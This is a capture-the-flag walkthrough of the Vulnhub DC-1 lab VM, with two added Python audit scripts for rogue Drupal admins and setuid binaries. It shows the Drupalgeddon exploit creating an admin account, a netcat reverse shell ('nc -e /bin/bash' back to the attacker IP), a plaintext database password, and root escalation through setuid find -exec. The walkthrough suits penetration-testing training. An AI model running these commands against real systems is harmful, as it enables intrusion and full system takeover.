Walkthrough: Vulnhub - DC: 1

· by Christoph Stoettner · Read in about 5 min · (905 words)
Download and Information
Original Description

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

Recon

root@kali:~# nmap -p- -A 10.128.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-04 12:44 EST
Nmap scan report for DC-1.stoeps.lab (10.128.1.152)
Host is up (0.00063s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          42642/tcp   status
|   100024  1          49668/udp   status
|   100024  1          57477/tcp6  status
|_  100024  1          57545/udp6  status
42642/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:76:3D:59 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Drupal

searchsploit drupal 7
 ------------------------------------------------------------------------------------------------------------------
 Exploit Title                                                       |  Path (/usr/share/exploitdb/)
 ------------------------------------------------------------------------------------------------------------------

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)    | exploits/php/webapps/34992.py
Create Admin account
root@kali:~/vulnhub/dc1# cp /usr/share/exploitdb/exploits/php/webapps/34992.py .
root@kali:~/vulnhub/dc1# dos2unix 34992.py
root@kali:~/vulnhub/dc1# ./34992.py -t http://10.128.1.152 -u stoeps -p pass
...
[!] VULNERABLE!

[!] Administrator user created!

[*] Login: stoeps
[*] Pass: pass
[*] Url: http://10.128.1.152/?q=node&destination=node

Now we can log in to the Drupal site as administrator, install modules, change settings and so on.
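The footprint this exploit leaves on the target is an extra account holding the administrator role. As an added example (my code, not the exploit's or Drupal's), a check that lists administrator accounts from the Drupal 7 user tables and flags any that are not in a known baseline; the rows, the KNOWN_ADMINS baseline and the timestamps are constructed for illustration, and SQLite stands in for the site's MySQL database.

```python
import sqlite3
import time

# Constructed rows modelled on the Drupal 7 `users`, `users_roles` and `role` tables;
# the values are made up for this example, not dumped from the DC-1 box.
ROLES = [(1, "anonymous user"), (2, "authenticated user"), (3, "administrator")]
USERS = [  # uid, name, mail, created (unix time), status
    (1, "admin", "admin@example.lab", 1_420_000_000, 1),
    (2, "editor", "editor@example.lab", 1_430_000_000, 1),
    (3, "stoeps", "stoeps@example.lab", 1_578_160_000, 1),  # the account the exploit added
]
USERS_ROLES = [(1, 3), (2, 2), (3, 3)]

# Hypothetical baseline: accounts that are allowed to hold the administrator role.
KNOWN_ADMINS = {"admin"}

def load_sample():
    """Build an in-memory SQLite copy of the three tables (stand-in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(uid INTEGER, name TEXT, mail TEXT, created INTEGER, status INTEGER);
        CREATE TABLE users_roles(uid INTEGER, rid INTEGER);
        CREATE TABLE role(rid INTEGER, name TEXT);""")
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", USERS)
    conn.executemany("INSERT INTO users_roles VALUES (?,?)", USERS_ROLES)
    conn.executemany("INSERT INTO role VALUES (?,?)", ROLES)
    return conn

# Active accounts that hold the administrator role, oldest first.
ADMIN_QUERY = """
SELECT u.uid, u.name, u.created FROM users u
JOIN users_roles ur ON ur.uid = u.uid
JOIN role r ON r.rid = ur.rid
WHERE r.name = 'administrator' AND u.status = 1
ORDER BY u.created"""

def rogue_admins(conn, known=KNOWN_ADMINS, created_after=None):
    """Administrator accounts missing from the baseline; with created_after set,
    only those created after that unix time (e.g. the last verified audit)."""
    hits = []
    for uid, name, created in conn.execute(ADMIN_QUERY):
        if name in known:
            continue
        if created_after is not None and created <= created_after:
            continue
        hits.append({"uid": uid, "name": name,
                     "created": time.strftime("%Y-%m-%d", time.gmtime(created))})
    return hits
```

Against a live site the same query runs unchanged on the MySQL database named in settings.php; an unexpected hit means the account should be disabled and the site patched, not just the account removed.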

Opening netcat shell

Start a listener on Kali:
nc -nlvp 7777
Start nc from the Drupal shell:
nc -e /bin/bash 10.128.1.154 7777   (1)
(1) Use the Kali IP here
Then upgrade to a real tty:
python -c 'import pty; pty.spawn("/bin/sh")'

Grab the flags through the netcat shell and the browser

Flag1

www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.

Flag2

www-data@DC-1:/var/www/sites/default$ cat set
cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
...

We could extract the users and password hashes from the MySQL database and crack them with John the Ripper, but that is not needed since we created our own admin account. I found nothing interesting in the database.

Flag3

Flag 3 is an article on the dashboard within Drupal.

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

Flag4

/home/flag4/flag4.txt
> cat /home/flag4/flag4.txt

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

Flag 4 was readable by the user www-data, so there was no need to crack the password hash from /etc/shadow.

Final Flag

www-data@DC-1:/var/www/sites/default$ find / -perm /4000
find / -perm /4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find         (1)
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

www-data@DC-1:/var/www/sites/default$ ls -l /usr/bin/find
ls -l /usr/bin/find

bash-4.2$ find . -exec '/bin/sh' \;
find . -exec '/bin/sh' \;

# whoami
whoami
root

# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

# cd /root
cd /root

# ls
ls
thefinalflag.txt
(1) find can be used with -exec
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
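The escalation above works because /usr/bin/find carries the setuid bit and -exec runs its command with the effective uid of root. As an added example (my code, not from the original post), a small audit that diffs a host's setuid inventory against a baseline and separately flags setuid programs that can execute arbitrary commands; the EXPECTED_SUID baseline and the SHELL_CAPABLE list are assumptions for illustration, and the input is the find output shown above, embedded as a constructed sample.

```python
import os

# Constructed input: the setuid inventory printed by `find / -perm /4000` on DC-1.
SAMPLE_FIND_OUTPUT = "\n".join([
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/ping6", "/bin/umount",
    "/usr/bin/at", "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/newgrp",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/procmail", "/usr/bin/find",
    "/usr/sbin/exim4", "/usr/lib/pt_chown", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/sbin/mount.nfs",
])

# Hypothetical baseline of setuid files expected on this host; in practice take it
# from a clean reference image or the package manager, never from the suspect box.
EXPECTED_SUID = {
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/ping6", "/bin/umount",
    "/usr/bin/at", "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/newgrp",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/procmail", "/usr/sbin/exim4",
    "/usr/lib/pt_chown", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/sbin/mount.nfs",
}

# Programs that execute arbitrary commands (find -exec, shells, interpreters, pagers
# with shell escapes); with the setuid bit set they are a root shell in waiting.
SHELL_CAPABLE = {"find", "bash", "sh", "python", "perl", "awk", "vim", "less", "more", "env"}

def audit_suid(find_output, expected=EXPECTED_SUID):
    """Return (unexpected, shell_capable): setuid paths missing from the baseline,
    and setuid paths whose program can spawn a shell, whether baselined or not."""
    paths = [p.strip() for p in find_output.splitlines() if p.strip()]
    unexpected = sorted(p for p in paths if p not in expected)
    shell_capable = sorted(p for p in paths if os.path.basename(p) in SHELL_CAPABLE)
    return unexpected, shell_capable

def remediation(paths):
    """Commands an administrator runs (as root) to strip the setuid bit again."""
    return [f"chmod u-s {p}" for p in sorted(paths)]

if __name__ == "__main__":
    unexpected, risky = audit_suid(SAMPLE_FIND_OUTPUT)
    print("not in baseline:", unexpected)
    print("shell-capable setuid:", risky)
    print("\n".join(remediation(set(unexpected) | set(risky))))
```

On a real host feed it the output of the same find command run as root, and treat anything in the shell-capable list as a finding even when the baseline happens to contain it.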

We’re done! A fun Vulnhub machine that can be solved in a short time. Looking forward to the other eight machines in the series. Thanks @DCAU7